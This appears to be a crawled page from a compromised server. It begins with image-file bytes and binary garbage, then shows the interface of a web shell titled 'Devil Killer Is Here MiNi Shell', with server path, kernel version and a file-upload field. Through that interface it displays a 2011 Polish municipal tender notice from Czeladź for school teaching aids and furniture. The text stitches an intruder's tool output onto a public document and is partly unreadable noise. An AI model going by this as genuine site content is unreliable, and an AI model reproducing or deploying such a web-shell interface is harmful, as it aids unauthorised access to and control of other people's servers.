JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111129/401834-N-2011.html

<p class="kh_header"><b>Czeladź: Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź</b><br>
<b>Numer ogłoszenia: 401834 - 2011; data zamieszczenia: 29.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czeladź reprezentowana przez Burmistrza , ul. Katowicka 45, 41-250 Czeladź, woj. śląskie, tel. 032 7637923, faks 032 7633694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czeladz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź. Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Pododdziale 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.

Zadanie nr 1: Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź do SZKOŁY PODSTAWOWEJ NR 1 W CZELADZI, ul. Reymonta 80.
Kody CPV dot. zadania (39162100-6 pomoce dydaktyczne; 39162110-9 - sprzęt dydaktyczny; 22110000-4- drukowane książki; 30190000-7- różny sprzęt i artykuły biurowe; 37400000-2 artykuły i sprzęt sportowy)
1.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, zagrożonych ryzykiem dysleksji.
2.	Dostawa materiałów dydaktycznych do prowadzenia gimnastyki korekcyjnej dla dzieci z wadami postawy. 
3.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w dziedzinie nauk matematyczno- przyrodniczych. 
4.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych artystycznie. 
Szczegółowy opis przedmiotu zamówienia w załączniku nr 1a do SIWZ.
Zadanie nr 2 : Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź do SZKOŁY PODSTAWOWEJ NR 2 W CZELADZI, ul. Szkolna 6 .
Kody CPV dot. zadania (39162100-6 pomoce dydaktyczne; 39162110-9 - sprzęt dydaktyczny; 22110000-4- drukowane książki; 30190000-7- różny sprzęt i artykuły biurowe; 37400000-2 artykuły i sprzęt sportowy)
1.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, zagrożonych ryzykiem dysleksji.
2.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
3.	Dostawa materiałów dydaktycznych do prowadzenia gimnastyki korekcyjnej dla dzieci z wadami postawy.
4.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w dziedzinie nauk matematyczno- przyrodniczych.
Szczegółowy opis przedmiotu zamówienia w załączniku nr 1b do SIWZ.
Zadanie nr 3: Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź do SZKOŁY PODSTAWOWEJ NR 3 W CZELADZI, ul. Staszica 47.
Kody CPV dot. zadania (39162100-6 pomoce dydaktyczne; 39162110-9 - sprzęt dydaktyczny; 22110000-4- drukowane książki; 30190000-7- różny sprzęt i artykuły biurowe; 37400000-2 artykuły i sprzęt sportowy; 39160000-1 meble szkolne)

1.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, zagrożonych ryzykiem dysleksji.
2.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
3.	Dostawa materiałów dydaktycznych do prowadzenia gimnastyki korekcyjnej dla dzieci z wadami postawy. 
4.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w dziedzinie nauk matematyczno- przyrodniczych. 
Szczegółowy opis przedmiotu zamówienia w załączniku nr 1c do SIWZ.
Zadanie nr 4: Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź do SZKOŁY PODSTAWOWEJ NR 7 W CZELADZI, ul. Spacerowa 2.
Kody CPV dot. zadania (39162100-6 pomoce dydaktyczne; 39162110-9 - sprzęt dydaktyczny; 22110000-4- drukowane książki; 30190000-7- różny sprzęt i artykuły biurowe; 37400000-2 artykuły i sprzęt sportowy; 39160000-1 meble szkolne; 32330000-5- aparatura do nagrywania i powielania dźwięku i obrazu wideo)
1.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, zagrożonych ryzykiem dysleksji. 
2.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
3.	Dostawa materiałów dydaktycznych do prowadzenia zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy.
4.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych dziedzinie nauki języka angielskiego.
5.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych artystycznie. 
Szczegółowy opis przedmiotu zamówienia w załączniku nr 1d do SIWZ.
Wymagania stawiane Wykonawcy przez Zamawiającego
1)  Zamawiający wymaga, żeby dostarczone pomoce dydaktyczne, materiały biurowe i wyposażenie były nowe, kompletne, wykonane w ramach bezpiecznych technologii oraz żeby spełniały wymagania obowiązujących norm, zapakowane w opakowania umożliwiające jednoznaczną identyfikację zapakowanego produktu. 
2)  Zamawiający wymaga, żeby wszystkie elementy przedmiotu zamówienia, które tego wymagają były zaopatrzone w instrukcję w języku polskim.
3)  Wszystkie urządzenia i sprzęt muszą posiadać certyfikaty i atesty dopuszczające do użytku w szkole określone w odrębnych przepisach.
4)  Produkty, które tego wymagają muszą posiadać niezbędne certyfikaty bezpieczeństwa określone w odrębnych przepisach. 
5) Zaleca się, aby dostarczony asortyment zapakowany był w tekturowych pudełkach uniemożliwiających uszkodzenie produktów w czasie transportu.
6) Odpowiedzialność za uszkodzenia produktów w czasie transportu ponosi Wykonawca.
7) Wady towaru powstałe z winy Wykonawcy, których Zamawiający nie mógł stwierdzić przy odbiorze, zostaną usunięte przez Wykonawcę poprzez wymianę towaru na nowy w terminie 7 dni od zgłoszenia przez Zamawiającego.
8) Wykonawca dostarczy materiały bezpośrednio do szkół, w dniach prac Szkoły Podstawowej Nr1; Szkoły Podstawowej Nr 2; Szkoły Podstawowej Nr 3 i Szkoły Podstawowej Nr 7 w Czeladzi od poniedziałku do piątku w godzinach od 7.00 do 15.00. Każda dostawa będzie uzgodniona szczegółowo pomiędzy Zamawiającym, a Wykonawcą.
9) Wykonawca we własnym zakresie zapewni rozładunek dostarczonych pomocy dydaktycznych.

Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na  okres min. 12 miesięcy od dnia odbioru dostawy bez zastrzeżeń.
W przypadku rzutnika, o którym mowa w załączniku Nr 1a, Nr 1d Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres nie mniej niż 24 miesiące..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 39.16.00.00-1, 32.33.00.00-5, 30.19.00.00-7, 37.40.00.00-2, 22.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz wykazu zrealizowanych dostaw.
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, należycie wykonał co najmniej 1 dostawę pomocy dydaktycznych o wartości brutto nie mniejszej niż:
a	dla zadania 1 : 27.000,00 zł
b	dla zadania 2 : 38.000,00 zł	
c	dla zadania 3 : 13.000,00 zł	
d	dla zadania 4 : 40.000,00 zł	

W przypadku składania oferty na więcej niż jedno zadanie Wykonawcę obowiązuje wykazanie wykonania dostaw dla zadania o większej wartości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy wraz z formularzem cenowym (tj. zał. 1a, 1b, 1c, lub 1d do SIWZ- w zależności od tego, na które zadanie Wykonawca składa ofertę),
2. Pisemne zobowiązanie podmiotów oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów.
3. Pełnomocnictwo, określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik.
4. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowaniu w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie zamówienia.
5. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców (art. 23 ust. 4 Ustawy)
6. W przypadku osoby (osób) fizycznych prowadzących działalność gospodarczą Zamawiający będzie wymagał przed zawarciem umowy przedstawienia aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w sytuacji:
- wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu;
 - konieczności wprowadzenia zmian będącej następstwem zmian wytycznych lub zaleceń instytucji, która przyznała środki na sfinansowanie zamówienia;
- jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
W szczególności Zamawiający dopuszcza: 
1	zmianę treści umowy w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyzna środki na sfinansowanie zamówienia.
2	zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze Stron musi udokumentować, pod warunkiem, że takiej zgody udzieli instytucja dofinansowująca i że Zamawiający nie straci dofinansowania; 
3	zmianę podwykonawcy lub części wykonywanego przez niego zakresu przedmiotu umowy, bądź wprowadzenie nowego podwykonawcy, pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o udzielenie zamówienia publicznego dotychczasowy podwykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czeladz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Czeladź, 41-250 Czeladź, ul. Katowicka 45 - Wydział Polityki Społecznej i Edukacji pokój Nr 205, tel. (32) 76 37 951 lub Fax (32) 76 33 694, e-mail: edukacja@um.czeladz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2011 godzina 09:00, miejsce: Kancelaria Urzędu Miasta Czeladź, ul. Katowicka 45, pokój nr 118 (I piętro), 41-250 Czeladź.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź do SZKOŁY PODSTAWOWEJ NR 1 W CZELADZI, ul. Reymonta 80.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kody CPV dot. zadania (39162100-6 pomoce dydaktyczne; 39162110-9 - sprzęt dydaktyczny; 22110000-4- drukowane książki; 30190000-7- różny sprzęt i artykuły biurowe; 37400000-2 artykuły i sprzęt sportowy)
1.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, zagrożonych ryzykiem dysleksji.
2.	Dostawa materiałów dydaktycznych do prowadzenia gimnastyki korekcyjnej dla dzieci z wadami postawy. 
3.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w dziedzinie nauk matematyczno- przyrodniczych. 
4.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych artystycznie. 
Szczegółowy opis przedmiotu zamówienia w załączniku nr 1a do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 22.11.00.00-4, 30.19.00.00-7, 37.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź do SZKOŁY PODSTAWOWEJ NR 2 W CZELADZI, ul. Szkolna 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kody CPV dot. zadania (39162100-6 pomoce dydaktyczne; 39162110-9 - sprzęt dydaktyczny; 22110000-4- drukowane książki; 30190000-7- różny sprzęt i artykuły biurowe; 37400000-2 artykuły i sprzęt sportowy)
1.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, zagrożonych ryzykiem dysleksji.
2.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
3.	Dostawa materiałów dydaktycznych do prowadzenia gimnastyki korekcyjnej dla dzieci z wadami postawy.
4.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w dziedzinie nauk matematyczno- przyrodniczych.
Szczegółowy opis przedmiotu zamówienia w załączniku nr 1b do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 22.11.00.00-4, 30.19.00.00-7, 37.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
